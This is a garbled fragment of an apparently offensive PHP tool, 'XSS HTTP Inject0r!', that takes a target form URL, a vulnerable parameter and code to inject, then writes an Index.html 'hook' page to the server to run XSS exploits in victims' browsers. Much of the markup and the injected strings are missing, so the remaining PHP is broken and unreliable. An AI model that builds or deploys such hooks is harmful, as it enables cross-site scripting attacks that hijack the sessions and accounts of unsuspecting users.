| XSS HTTP Inject0r! - 2014 - GPLv3 |


'Hook' targets to execute XSS exploits on their browsers... |Back|

1-
Target (Url to target's form):
Vulnerability (Vulnerable parameter):
Injection (Code to inject):
Method (GET/POST):
2-
File:Index.html
3-



"; $sHTML_Content = "
"; $sHTML_Footer = ""; $filename = "Index.html"; // this is the filename of the archive ('hook') generated on your server. if (is_writable(getcwd())) { IF (!$handle = fopen($filename, 'w')) { echo "Cannot open file ($filename)"; exit; } if (fwrite($handle, $sHTML_Header) === FALSE) { echo "Cannot write to file ($filename)"; exit; }else{ fwrite($handle, $sHTML_Content); fwrite($handle, $sHTML_Footer); } fclose($handle); }else{ echo "The file $filename is not writable (use: chown www-data:www-data $filename)"; } } ?>